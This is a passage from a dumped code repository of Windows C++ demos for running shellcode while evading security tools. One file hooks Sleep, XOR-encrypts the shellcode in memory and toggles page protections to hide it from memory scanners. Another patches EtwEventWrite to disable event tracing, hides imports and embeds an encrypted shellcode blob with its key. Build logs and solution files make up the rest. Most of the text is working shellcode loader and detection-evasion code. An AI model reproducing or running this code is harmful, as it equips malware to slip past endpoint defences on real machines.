PAGE_READWRITE : PAGE_NOACCESS;\n\n            return ((mbi.Protect & PAGE_EXECUTE_READ) \n                || (mbi.Protect & PAGE_EXECUTE_READWRITE)\n                || (mbi.Protect & expectedProtection));\n        }\n    }\n\n    return false;\n}\n\nbool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAddress, HookTrampolineBuffers* buffers)\n{\n#ifdef _WIN64\n    uint8_t trampoline[] = {\n        0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov r10, addr\n        0x41, 0xFF, 0xE2                                            // jmp r10\n    };\n\n    uint64_t addr = (uint64_t)(jumpAddress);\n    memcpy(&trampoline[2], &addr, sizeof(addr));\n#else\n    uint8_t trampoline[] = {\n        0xB8, 0x00, 0x00, 0x00, 0x00,     // mov eax, addr\n        0xFF, 0xE0                        // jmp eax\n    };\n\n    uint32_t addr = (uint32_t)(jumpAddress);\n    memcpy(&trampoline[1], &addr, sizeof(addr));\n#endif\n\n    DWORD dwSize = sizeof(trampoline);\n    DWORD oldProt = 0;\n    bool output = false;\n\n    if (installHook)\n    {\n        if (buffers != NULL)\n        {\n            if (buffers->previousBytes == nullptr || buffers->previousBytesSize == 0)\n                return false;\n\n            memcpy(buffers->previousBytes, addressToHook, buffers->previousBytesSize);\n        }\n\n        if (::VirtualProtect(\n            addressToHook,\n            dwSize,\n            PAGE_EXECUTE_READWRITE,\n            &oldProt\n        ))\n        {\n            memcpy(addressToHook, trampoline, dwSize);\n            output = true;\n        }\n    }\n    else\n    {\n        if (buffers == NULL)\n            return false;\n\n        if (buffers->originalBytes == nullptr || buffers->originalBytesSize == 0)\n            return false;\n\n        dwSize = buffers->originalBytesSize;\n\n        if (::VirtualProtect(\n            addressToHook,\n            dwSize,\n            PAGE_EXECUTE_READWRITE,\n            &oldProt\n        ))\n        {\n     
       memcpy(addressToHook, buffers->originalBytes, dwSize);\n            output = true;\n        }\n    }\n\n    static typeNtFlushInstructionCache pNtFlushInstructionCache = NULL;\n    if (!pNtFlushInstructionCache)\n    {\n        pNtFlushInstructionCache = (typeNtFlushInstructionCache)GetProcAddress(GetModuleHandleA(\"ntdll\"), \"NtFlushInstructionCache\");\n    }\n\n    pNtFlushInstructionCache(GetCurrentProcess(), addressToHook, dwSize);\n\n\n    ::VirtualProtect(\n        addressToHook,\n        dwSize,\n        oldProt,\n        &oldProt\n    );\n\n    return output;\n}\n\nbool hookSleep()\n{\n    HookTrampolineBuffers buffers = { 0 };\n    buffers.previousBytes = g_hookedSleep.sleepStub;\n    buffers.previousBytesSize = sizeof(g_hookedSleep.sleepStub);\n\n    g_hookedSleep.origSleep = reinterpret_cast<typeSleep>(::Sleep);\n\n    if (!fastTrampoline(true, (BYTE*)::Sleep, (void*)&MySleep, &buffers))\n        return false;\n\n    return true;\n}\n\nvoid shellcodeEncryptDecrypt(LPVOID callerAddress)\n{\n    if ((g_fluctuate != NoFluctuation) && g_fluctuationData.shellcodeAddr != nullptr && g_fluctuationData.shellcodeSize > 0)\n    {\n        if (!isShellcodeThread(callerAddress))\n            return;\n\n        DWORD oldProt = 0;\n\n        if (!g_fluctuationData.currentlyEncrypted \n            || (g_fluctuationData.currentlyEncrypted && g_fluctuate == FluctuateToNA))\n        {\n            ::VirtualProtect(\n                g_fluctuationData.shellcodeAddr,\n                g_fluctuationData.shellcodeSize,\n                PAGE_READWRITE,\n                &g_fluctuationData.protect\n            );\n\n            log(\"[>] Flipped to RW.\");\n        }\n        \n        log((g_fluctuationData.currentlyEncrypted) ? 
\"[<] Decoding...\" : \"[>] Encoding...\");\n\n        xor32(\n            reinterpret_cast<uint8_t*>(g_fluctuationData.shellcodeAddr),\n            g_fluctuationData.shellcodeSize,\n            g_fluctuationData.encodeKey\n        );\n\n        if (!g_fluctuationData.currentlyEncrypted && g_fluctuate == FluctuateToNA)\n        {\n            //\n            // Here we're utilising ORCA666's idea to mark the shellcode as PAGE_NOACCESS instead of PAGE_READWRITE\n            // and our previously set up vectored exception handler should catch invalid memory access, flip back memory\n            // protections and resume the execution.\n            // \n            // Be sure to check out ORCA666's original implementation here:\n            //      https://github.com/ORCA666/0x41/blob/main/0x41/HookingLoader.hpp#L285\n            //\n\n            ::VirtualProtect(\n                g_fluctuationData.shellcodeAddr,\n                g_fluctuationData.shellcodeSize,\n                PAGE_NOACCESS,\n                &oldProt\n            );\n\n            log(\"[>] Flipped to No Access.\\n\");\n        }\n        else if (g_fluctuationData.currentlyEncrypted)\n        {\n            ::VirtualProtect(\n                g_fluctuationData.shellcodeAddr,\n                g_fluctuationData.shellcodeSize,\n                g_fluctuationData.protect,\n                &oldProt\n            );\n\n            log(\"[<] Flipped back to RX/RWX.\\n\");\n        }\n\n        g_fluctuationData.currentlyEncrypted = !g_fluctuationData.currentlyEncrypted;\n    }\n}\n\nLONG NTAPI VEHHandler(PEXCEPTION_POINTERS pExceptInfo)\n{\n    if (pExceptInfo->ExceptionRecord->ExceptionCode == 0xc0000005)\n    {\n#ifdef _WIN64\n        ULONG_PTR caller = pExceptInfo->ContextRecord->Rip;\n#else\n        ULONG_PTR caller = pExceptInfo->ContextRecord->Eip;\n#endif\n\n        log(\"[.] 
Access Violation occurred at 0x\", std::hex, std::setw(8), std::setfill('0'), caller);\n\n        //\n        // Check if the exception's instruction pointer (EIP/RIP) points back to our shellcode allocation.\n        // If it does, it means our shellcode attempted to run but was unable to due to the PAGE_NOACCESS.\n        //\n        if ((caller >= (ULONG_PTR)g_fluctuationData.shellcodeAddr)\n            && (caller <= ((ULONG_PTR)g_fluctuationData.shellcodeAddr + g_fluctuationData.shellcodeSize)))\n        {\n            log(\"[+] Shellcode wants to Run. Restoring to RX and Decrypting\\n\");\n\n            //\n            // We'll now decrypt (XOR32) shellcode's memory allocation and flip its memory pages back to RX.\n            //\n            shellcodeEncryptDecrypt((LPVOID)caller);\n\n            //\n            // Tell the system everything's OK and we can carry on.\n            //\n            return EXCEPTION_CONTINUE_EXECUTION;\n        }\n    }\n\n    log(\"[.] Unhandled exception occurred. Not the one due to PAGE_NOACCESS :(\");\n\n    //\n    // Oops, something else just happened and that wasn't due to our PAGE_NOACCESS trick.\n    //\n    return EXCEPTION_CONTINUE_SEARCH;\n}\n\nbool readShellcode(const char* path, std::vector<uint8_t>& shellcode)\n{\n    HandlePtr file(CreateFileA(\n        path,\n        GENERIC_READ,\n        FILE_SHARE_READ,\n        NULL,\n        OPEN_EXISTING,\n        0,\n        NULL\n    ), &::CloseHandle);\n\n    if (INVALID_HANDLE_VALUE == file.get())\n        return false;\n\n    DWORD highSize;\n    DWORD readBytes = 0;\n    DWORD lowSize = GetFileSize(file.get(), &highSize);\n\n    shellcode.resize(lowSize, 0);\n\n    return ReadFile(file.get(), shellcode.data(), lowSize, &readBytes, NULL);\n}\n\nvoid runShellcode(LPVOID param)\n{\n    auto func = ((void(*)())param);\n\n    //\n    // Jumping to shellcode. 
Look at the comment in injectShellcode() describing why we opted to jump\n    // into shellcode in a classical manner instead of fancy hooking \n    // ntdll!RtlUserThreadStart+0x21 like in ThreadStackSpoofer example.\n    //\n    func();\n}\n\nbool injectShellcode(std::vector<uint8_t>& shellcode, HandlePtr &thread)\n{\n    //\n    // Firstly we allocate RW page to avoid RWX-based IOC detections\n    //\n    auto alloc = ::VirtualAlloc(\n        NULL,\n        shellcode.size() + 1,\n        MEM_COMMIT,\n        PAGE_READWRITE\n    );\n\n    if (!alloc) \n        return false;\n\n    memcpy(alloc, shellcode.data(), shellcode.size());\n\n    DWORD old;\n    \n    //\n    // Then we change that protection to RX\n    // \n    if (!VirtualProtect(alloc, shellcode.size() + 1, Shellcode_Memory_Protection, &old))\n        return false;\n\n    /*\n    * We're not setting these pointers to let the hooked sleep handler figure them out itself.\n    * \n    g_fluctuationData.shellcodeAddr = alloc;\n    g_fluctuationData.shellcodeSize = shellcode.size();\n    g_fluctuationData.protect = Shellcode_Memory_Protection;\n    */\n\n    shellcode.clear();\n\n    //\n    // Example provided in https://github.com/mgeeky/ThreadStackSpoofer showed how we can start\n    // our shellcode from temporarily hooked ntdll!RtlUserThreadStart+0x21 .\n    // \n    // That approach was a bit flawed because, as soon as we introduce a hook within a module,\n    // even when we immediately unhook it the system allocates a page of memory (4096 bytes) of type MEM_PRIVATE\n    // inside of a shared library allocation that comprises MEM_IMAGE/MEM_MAPPED pool. \n    // \n    // Memory scanners such as Moneta are sensitive to scanning memory mapped PE DLLs and finding an amount of memory\n    // labeled as MEM_PRIVATE within their region, considering this (correctly!) 
as a \"Modified Code\" anomaly.\n    // \n    // We're unable to evade this detection for kernel32!Sleep however we can when it comes to ntdll. Instead of\n    // running our shellcode from a legitimate user thread callback, we can simply run a thread pointing to our\n    // method and we'll instead jump to the shellcode from that method.\n    //\n    thread.reset(::CreateThread(\n        NULL,\n        0,\n        (LPTHREAD_START_ROUTINE)runShellcode,\n        alloc,\n        0,\n        0\n    ));\n\n    return (NULL != thread.get());\n}\n\nstd::string replace(const std::string& inStr, const char* pSrc, const char* pReplace)\n\n{\n    std::string str = inStr;\n    std::string::size_type stStart = 0;\n    std::string::iterator iter = str.begin();\n    while (iter != str.end())\n\n    {\n        std::string::size_type st = str.find(pSrc, stStart);\n\n        if (st == str.npos)\n\n        {\n            break;\n        }\n\n        iter = iter + st - stStart;\n        str.replace(iter, iter + strlen(pSrc), pReplace);\n        iter = iter + strlen(pReplace);\n        stStart = st + strlen(pReplace);\n    }\n\n    return str;\n\n}\n\nint main(int argc, char** argv)\n{\n   \n\n    std::string rest2_reference = \"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@@\";\n\n    std::string rest3_reference = replace(rest2_reference, \"@@\", \"==\");\n\n    std::string rest2_decoded = base64_decode(rest3_reference);\n\n    const char* S = rest2_decoded.c_str();\n\n    std::vector<uint8_t> shellcode;\n\n    for (int j = 0; j < rest2_decoded.length(); j++) {\n        shellcode.push_back(S[j]^XOR_KEY);\n    }\n\n    //LoadLibraryA(\"C:\\\\Users\\\\Admin\\\\Desktop\\\\RefleXXion-DLL.dll\");\n\n    try\n    {\n        // Don't you play tricks with values outside of this enum, I'm feeling like catching all your edge cases...\n        g_fluctuate = (TypeOfFluctuation)1;\n    }\n    catch (...)\n    {\n        log(\"[!] 
Invalid <fluctuate> mode provided\");\n        return 1;\n    }\n\n\n\n    if (g_fluctuate != NoFluctuation)\n    {\n        log(\"[.] Hooking kernel32!Sleep...\");\n        if (!hookSleep())\n        {\n            log(\"[!] Could not hook kernel32!Sleep!\");\n            return 1;\n        }\n    }\n    else\n    {\n        log(\"[.] Shellcode will not fluctuate its memory pages protection.\");\n    }\n\n    if (g_fluctuate == NoFluctuation)\n    {\n        log(\"[.] Entering infinite loop (not injecting the shellcode) for memory IOCs examination.\");\n        log(\"[.] PID = \", std::dec, GetCurrentProcessId());\n        while (true) {}\n    }\n    else if (g_fluctuate == FluctuateToNA)\n    {\n        log(\"\\n[.] Initializing VEH Handler to intercept invalid memory accesses due to PAGE_NOACCESS.\");\n        log(\"    This is a re-implementation of ORCA666's work presented in his https://github.com/ORCA666/0x41 project.\\n\");\n        AddVectoredExceptionHandler(1, &VEHHandler);\n    }\n\n    log(\"[.] Injecting shellcode...\");\n\n    HandlePtr thread(NULL, &::CloseHandle);\n    if (!injectShellcode(shellcode, thread))\n    {\n        log(\"[!] Could not inject shellcode! Error: \", ::GetLastError());\n        return 1;\n    }\n\n    log(\"[+] Shellcode is now running. PID = \", std::dec, GetCurrentProcessId());\n\n    WaitForSingleObject(thread.get(), INFINITE);\n}"
  },
  {
    "path": "chapter4-demo4/ShellcodeFluctuation/x64/Debug/Shellcod.9eed9e19.tlog/ShellcodeFluctuation.lastbuildstate",
    "content": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nDebug|x64|E:\\ShellcodeFluctuation-master\\|\r\n"
  },
  {
    "path": "chapter4-demo4/ShellcodeFluctuation/x64/Debug/ShellcodeFluctuation.exe.recipe",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n  <ProjectOutputs>\r\n    <ProjectOutput>\r\n      <FullPath>E:\\ShellcodeFluctuation-master\\x64\\Debug\\ShellcodeFluctuation.exe</FullPath>\r\n    </ProjectOutput>\r\n  </ProjectOutputs>\r\n  <ContentFiles />\r\n  <SatelliteDlls />\r\n  <NonRecipeFileRefs />\r\n</Project>"
  },
  {
    "path": "chapter4-demo4/ShellcodeFluctuation/x64/Debug/ShellcodeFluctuation.log",
    "content": "﻿  base64.cpp\r\n  main.cpp\r\n  正在生成代码...\r\n  ShellcodeFluctuation.vcxproj -> E:\\ShellcodeFluctuation-master\\x64\\Debug\\ShellcodeFluctuation.exe\r\n"
  },
  {
    "path": "chapter4-demo4/ShellcodeFluctuation/x64/Release/Shellcod.9eed9e19.tlog/ShellcodeFluctuation.lastbuildstate",
    "content": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nRelease|x64|E:\\ShellcodeFluctuation-master\\|\r\n"
  },
  {
    "path": "chapter4-demo4/ShellcodeFluctuation/x64/Release/ShellcodeFluctuation.exe.recipe",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n  <ProjectOutputs>\r\n    <ProjectOutput>\r\n      <FullPath>E:\\ShellcodeFluctuation-master\\x64\\Release\\ShellcodeFluctuation.exe</FullPath>\r\n    </ProjectOutput>\r\n  </ProjectOutputs>\r\n  <ContentFiles />\r\n  <SatelliteDlls />\r\n  <NonRecipeFileRefs />\r\n</Project>"
  },
  {
    "path": "chapter4-demo4/ShellcodeFluctuation/x64/Release/ShellcodeFluctuation.log",
    "content": "﻿  main.cpp\r\n  正在生成代码\r\n  已完成代码的生成\r\n  3 of 350 functions ( 0.9%) were compiled, the rest were copied from previous compilation.\r\n    0 functions were new in current compilation\r\n    0 functions had inline decision re-evaluated but remain unchanged\r\n  ShellcodeFluctuation.vcxproj -> E:\\ShellcodeFluctuation-master\\x64\\Release\\ShellcodeFluctuation.exe\r\n"
  },
  {
    "path": "chapter4-demo4/ShellcodeFluctuation.sln",
    "content": "﻿\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 16\nVisualStudioVersion = 16.0.31105.61\nMinimumVisualStudioVersion = 10.0.40219.1\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"ShellcodeFluctuation\", \"ShellcodeFluctuation\\ShellcodeFluctuation.vcxproj\", \"{9EED9E19-9475-4D2E-9B06-37D6799417FE}\"\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tDebug|x64 = Debug|x64\n\t\tDebug|x86 = Debug|x86\n\t\tRelease|x64 = Release|x64\n\t\tRelease|x86 = Release|x86\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{9EED9E19-9475-4D2E-9B06-37D6799417FE}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{9EED9E19-9475-4D2E-9B06-37D6799417FE}.Debug|x64.Build.0 = Debug|x64\n\t\t{9EED9E19-9475-4D2E-9B06-37D6799417FE}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{9EED9E19-9475-4D2E-9B06-37D6799417FE}.Debug|x86.Build.0 = Debug|Win32\n\t\t{9EED9E19-9475-4D2E-9B06-37D6799417FE}.Release|x64.ActiveCfg = Release|x64\n\t\t{9EED9E19-9475-4D2E-9B06-37D6799417FE}.Release|x64.Build.0 = Release|x64\n\t\t{9EED9E19-9475-4D2E-9B06-37D6799417FE}.Release|x86.ActiveCfg = Release|Win32\n\t\t{9EED9E19-9475-4D2E-9B06-37D6799417FE}.Release|x86.Build.0 = Release|Win32\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\n\tGlobalSection(ExtensibilityGlobals) = postSolution\n\t\tSolutionGuid = {C5AF3E09-A902-42DF-9A8C-D63A66F8F25B}\n\tEndGlobalSection\nEndGlobal\n"
  },
  {
    "path": "demo1/README.md",
    "content": "Evades detection of the shellcode by disabling ETW, encrypting the shellcode and hiding the import table.\r\n\r\n"
  },
  {
    "path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/resource.h",
    "content": "//{{NO_DEPENDENCIES}}\r\n// Microsoft Visual C++ generated include file.\r\n// Used by shellcode_execute.rc\r\n\r\n// Next default values for new objects\r\n// \r\n#ifdef APSTUDIO_INVOKED\r\n#ifndef APSTUDIO_READONLY_SYMBOLS\r\n#define _APS_NEXT_RESOURCE_VALUE        101\r\n#define _APS_NEXT_COMMAND_VALUE         40001\r\n#define _APS_NEXT_CONTROL_VALUE         1001\r\n#define _APS_NEXT_SYMED_VALUE           101\r\n#endif\r\n#endif\r\n"
  },
  {
    "path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.cpp",
    "content": "// shellcode_execute.cpp : This file contains the \"main\" function. Program execution begins and ends there.\r\n//\r\n\r\n#include <iostream>\r\n#include <windows.h>\r\n\r\ntypedef void* (*tNtVirtual) (HANDLE ProcessHandle, IN OUT PVOID* BaseAddress, IN OUT PSIZE_T  NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);\r\ntNtVirtual oNtVirtual;\r\n\r\n\r\nvoid disableETW(void) {\r\n\t// return 0\r\n\tunsigned char patch[] = { 0x48, 0x33, 0xc0, 0xc3 };     // xor rax, rax; ret\r\n\r\n\tULONG oldprotect = 0;\r\n\tsize_t size = sizeof(patch);\r\n\r\n\tHANDLE hCurrentProc = GetCurrentProcess();\r\n\r\n\tunsigned char sEtwEventWrite[] = { 'E','t','w','E','v','e','n','t','W','r','i','t','e', 0x0 };\r\n\r\n\r\n\r\n\r\n\tvoid* pEventWrite = GetProcAddress(GetModuleHandle(\"ntdll.dll\"), (LPCSTR)sEtwEventWrite);\r\n\tif ((DWORD)GetModuleHandle(\"ntdll.dll\") == NULL) { std::cout << \"error\"; }\r\n\telse {\r\n\t\tprintf(\"NTDLL.DLL START ADDRESS: %08x\", (DWORD)GetModuleHandle(\"ntdll.dll\"));\r\n\t}\r\n\tif ((DWORD)GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtProtectVirtualMemory\") == NULL) { std::cout << \"error\"; }\r\n\telse { printf(\"\\nNtProtectVirtualMemory ADDRESS: %08x\", (DWORD)GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtProtectVirtualMemory\")); }\r\n\r\n\tFARPROC farProc = GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtProtectVirtualMemory\");\r\n\r\n\r\n\toNtVirtual = (tNtVirtual)farProc;\r\n\toNtVirtual(hCurrentProc, &pEventWrite, (PSIZE_T)&size, PAGE_READWRITE, &oldprotect);\r\n\r\n\t//memcpy(pEventWrite, patch, size / sizeof(patch[0]));\r\n\tmemcpy(pEventWrite, patch, 4);\r\n\toNtVirtual(hCurrentProc, &pEventWrite, (PSIZE_T)&size, oldprotect, &oldprotect);\r\n\tFlushInstructionCache(hCurrentProc, pEventWrite, size);\r\n\r\n}\r\n\r\nint main()\r\n{\r\n\r\n\tdisableETW();\r\n\t// Encrypted shellcode and cipher key obtained from shellcode_encoder.py\r\n\tchar encryptedShellcode[] = 
\"\\x9d\\x2c\\xee\\x8d\\x9e\\xd9\\xfa\\x33\\x61\\x64\\x2c\\x38\\x2f\\x61\\x60\\x62\\x37\\x2c\\x5c\\xbb\\x0b\\x79\\xb9\\x61\\x01\\x2c\\xe6\\x3b\\x76\\x79\\xb9\\x61\\x41\\x2c\\xe6\\x1b\\x3e\\x79\\x3d\\x84\\x2b\\x2e\\x20\\x58\\xa7\\x79\\x03\\xf3\\xcd\\x58\\x0c\\x15\\x6c\\x1d\\x12\\x72\\xa0\\xad\\x60\\x28\\x6f\\xf0\\xd0\\xde\\x33\\x25\\x3c\\x21\\xe5\\x63\\x12\\xb8\\x23\\x58\\x25\\x68\\xbe\\x57\\xb3\\x4b\\x79\\x6f\\x6f\\x1c\\x1c\\xba\\xb2\\xbb\\x61\\x64\\x6d\\x21\\xeb\\xf1\\x46\\x54\\x29\\x65\\xbd\\x39\\xe5\\x79\\x2a\\x77\\xea\\x24\\x4d\\x20\\x6f\\xe1\\xd1\\x65\\x29\\x9b\\xa4\\x28\\xe5\\x05\\xba\\x7b\\x60\\xb2\\x20\\x58\\xa7\\x79\\x03\\xf3\\xcd\\x25\\xac\\xa0\\x63\\x70\\x33\\xf2\\x59\\x84\\x18\\x98\\x22\\x32\\x7e\\x17\\x69\\x21\\x54\\xb8\\x1b\\xe9\\x6a\\x77\\xea\\x24\\x49\\x20\\x6f\\xe1\\x54\\x72\\xea\\x68\\x25\\x2d\\xe5\\x71\\x2e\\x7a\\x60\\xb4\\x2c\\xe2\\x6a\\xb9\\x7a\\x32\\xb1\\x25\\x35\\x28\\x36\\x6f\\x6b\\x69\\x20\\x3c\\x2c\\x30\\x2f\\x6b\\x7a\\xb0\\x8d\\x44\\x2c\\x3b\\x91\\xd1\\x6a\\x72\\x38\\x3e\\x25\\xe2\\x7c\\xd8\\x7d\\xcc\\x9e\\x9b\\x30\\x03\\x6e\\x78\\x8c\\x44\\x08\\x0a\\x04\\x07\\x0b\\x45\\x32\\x72\\x37\\x2d\\xe4\\x8f\\x22\\xb8\\xc3\\x72\\xdb\\x28\\x1a\\x4f\\x69\\xce\\xe7\\x7b\\x50\\xad\\x25\\x58\\xbc\\x7c\\x03\\xf3\\x2c\\x55\\xa4\\x28\\x3e\\x70\\x62\\x72\\xdb\\x5e\\x3b\\x10\\xc9\\xce\\xe7\\xd8\\x12\\x3e\\x25\\xe0\\xaf\\x70\\x8a\\x63\\x61\\x64\\x6d\\x24\\x5f\\xf8\\x73\\x62\\x20\\x35\\x07\\x6a\\x2f\\x60\\x73\\x89\\x36\\xed\\xf2\\xaf\\x91\\xe4\\xd9\\x6a\\x3a\\x2c\\xe4\\xa8\\x26\\x00\\xe0\\x7a\\xe8\\xbc\\x20\\x58\\xa7\\x63\\x5a\\x33\\x63\\x24\\xe9\\x3b\\x3c\\x70\\x88\\xd8\\x34\\x4a\\x56\\x96\\xbb\\x79\\xbb\\xf5\\x29\\xe7\\xae\\x39\\x04\\x3b\\x6d\\x7b\\xe8\\x95\\x25\\xe0\\xb4\\x78\\xf5\\xf3\\x9e\\x9b\\x92\\x96\\x23\\x00\\xfb\\x61\\x33\\x25\\xd7\\x44\\x68\\x29\\x49\\xcc\\xb4\\xe1\\xad\\x66\\xeb\\xac\\x33\\x33\\x61\\x2c\\x92\\xa6\\x61\\xb5\\xbe\\x32\\x61\\x64\\x86\\xba\\x87\\xd5\\x33\\x33\\x61\\x8c\\xcf\\x96\\x91\\xce\\x1d\\x7b\\x08\\x33\\x38\\x69\\x4d\\x8f\\xa4\\x
d5\\x7b\\x55\\x01\\x8a\\x85\\x56\\x9c\\xb4\\x92\\x22\\x6b\\xd6\\x06\\x79\\xb1\\x2e\\x11\\x1b\\x45\\x36\\x97\\x6f\\x2d\\xf9\\x27\\x1a\\xde\\x58\\x82\\x9c\\x28\\xfb\\x0a\\x5a\\x47\\x5e\\x3a\\x95\\x9e\\x45\\x87\\xce\\x2e\\x71\\x66\\x11\\x44\\xa4\\xa2\\xc6\\xb4\\xda\\xb0\\xf0\\x79\\x01\\xa1\\x4b\\xa2\\xa2\\x6c\\x08\\x4d\\x5a\\x0f\\x2c\\x9c\\x35\\x49\\x31\\x67\\x40\\x04\\x16\\x40\\x28\\x09\\x54\\x5c\\x47\\x5b\\x44\\x20\\x06\\x14\\x58\\x5e\\x5f\\x00\\x4b\\x59\\x47\\x5e\\x11\\x1a\\x50\\x0e\\x09\\x1d\\x08\\x1a\\x58\\x50\\x5f\\x04\\x5f\\x4d\\x24\\x3d\\x78\\x77\\x13\\x59\\x4a\\x5d\\x52\\x4e\\x66\\x5b\\x5d\\x05\\x0b\\x1a\\x1a\\x4e\\x7f\\x66\\x13\\x54\\x4a\\x5c\\x52\\x4e\\x65\\x40\\x5a\\x05\\x01\\x03\\x1d\\x41\\x05\\x1c\\x03\\x5a\\x44\\x24\\x07\\x08\\x5e\\x62\\x52\\x15\\x0c\\x43\\x58\\x47\\x3c\\x38\\x33\\x1b\\xe3\\x8f\\x91\\x34\\x7d\\x94\\xe7\\x55\\x9e\\x46\\x53\\x60\\x6e\\x3f\\x4a\\xe7\\x37\\x40\\x69\\xe3\\x86\\xdc\\xd4\\x60\\x11\\xb2\\x3e\\xa5\\xe0\\xd7\\x59\\xf3\\xef\\x66\\xec\\xf6\\x89\\x3f\\x2e\\x04\\x9a\\x4d\\x63\\x28\\x8f\\x0c\\xf5\\x04\\xf9\\x39\\x69\\xee\\x77\\xfe\\xaa\\xcd\\x85\\x7d\\x3a\\xbc\\x22\\x48\\x4e\\x14\\x29\\x7c\\x69\\x7c\\xa1\\xb0\\xe2\\xa7\\xc3\\xa1\\xfd\\x39\\x08\\x58\\x09\\xd5\\x19\\x74\\x6e\\x29\\xc5\\xb6\\x8d\\x3a\\x27\\x52\\xd4\\xe4\\x0b\\x17\\xbf\\x2c\\x23\\xea\\x0b\\x2b\\xd1\\x28\\xef\\x7b\\xda\\x5b\\x15\\x29\\xd6\\x48\\x76\\x9d\\x43\\x7b\\x41\\x0e\\x14\\xe6\\x30\\xef\\x6e\\xbf\\x3f\\x9b\\xf2\\xbe\\xd6\\xbb\\x5f\\x67\\xf9\\x8e\\xd0\\x3d\\x9a\\x84\\x55\\xe9\\xd6\\x29\\x08\\xf9\\xae\\xf3\\x52\\x19\\xfa\\xf4\\xf7\\x5a\\xcf\\x79\\x9d\\x0a\\xb1\\x96\\x94\\xf7\\xed\\x72\\x5b\\xd8\\x2b\\x8c\\x23\\x93\\x35\\xcc\\x3e\\xe1\\xc2\\x4d\\xd7\\x05\\x7b\\x95\\xeb\\x2b\\x93\\xdb\\xf6\\xc0\\xbe\\x37\\x64\\xdd\\x2a\\x7a\\xf7\\xa0\\x70\\x3e\\xb2\\x1d\\x5b\\xa5\\x78\\x3e\\x78\\xa0\\x50\\xc1\\xa1\\xb2\\x03\\x9a\\x8b\\x8a\\x91\\xa9\\x29\\xae\\x31\\x73\\x8d\\x91\\xd1\\xcf\\x3f\\x91\\xe4\\x7a\\x02\\xa8\\xde\\x6d\\x69\\x2e\\x31\\x73\\x8b\\x61\\x74\\x6d\\x69\\x2f\\x88\\x72\\x
33\\x61\\x64\\x2c\\xd3\\x36\\x95\\x61\\xd6\\x9e\\xb1\\x25\\xfa\\x3d\\x62\\x7a\\xba\\x86\\x2c\\xe4\\x98\\x26\\xb8\\xe8\\x72\\xd9\\x64\\x4d\\x69\\x6e\\x78\\xbb\\xca\\x20\\xde\\x7f\\xff\\xe7\\xd3\\xcd\\xe6\\x29\\xe7\\xa9\\x49\\xeb\\xf1\\x46\\x85\\x07\\xef\\x6a\\x21\\x6f\\xf2\\xb7\\xf3\\x14\\xb3\\x35\\x31\\x36\\x79\\x37\\x33\\x61\\x64\\x6d\\x39\\xad\\xd9\\xad\\xce\\x9e\\x9b\\x5c\\x50\\x5c\\x1f\\x03\\x05\\x59\\x4a\\x5d\\x47\\x5f\\x02\\x03\\x33\\x30\\x6d\\xd2\\x04\";\r\n\tchar key[] = \"admin123\";\r\n\tchar cipherType[] = \"xor\";\r\n\r\n\r\n\t// Char array to host the deciphered shellcode\r\n\tchar shellcode[sizeof encryptedShellcode];\r\n\r\n\r\n\t// XOR decoding stub using the key defined above must be the same as the encoding key\r\n\tint j = 0;\r\n\tfor (int i = 0; i < sizeof encryptedShellcode; i++) {\r\n\t\tif (j == sizeof key - 1) j = 0;\r\n\r\n\t\tshellcode[i] = encryptedShellcode[i] ^ key[j];\r\n\t\tj++;\r\n\t}\r\n\r\n\ttypedef VOID *(WINAPI* pVirtualAlloc)(LPVOID lpAddress, SIZE_T  dwSize, DWORD  flAllocationType, DWORD flProtect);\r\n\r\n\tpVirtualAlloc fnVirtualProtect;\r\n\r\n\tunsigned char sVirtualProtect[] = { 'V','i','r','t','u','a','l','A','l','l','o','c', 0x0 };\r\n\tunsigned char sKernel32[] = { 'k','e','r','n','e','l','3','2','.','d','l','l', 0x0 };\r\n\r\n\tfnVirtualProtect = (pVirtualAlloc)GetProcAddress(GetModuleHandle((LPCSTR)sKernel32), (LPCSTR)sVirtualProtect);\r\n\t// call VirtualProtect\r\n\tvoid* exec = fnVirtualProtect(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\r\n\r\n\tmemcpy(exec, shellcode, sizeof shellcode);\r\n\r\n\t// Call the shellcode\r\n\t//((void(*)())exec)();\r\n\r\n}\r\n"
  },
  {
    "path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.rc",
